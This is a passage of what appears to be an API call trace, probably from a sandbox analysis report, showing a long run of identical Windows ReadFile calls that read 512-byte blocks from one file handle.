[0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, 
lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.049] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 
lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.050] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: 
lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.051] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, 
lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.052] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.053] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.054] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 
[0233.055] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, 
lpOverlapped=0x0) returned 1 [0233.056] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.057] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 
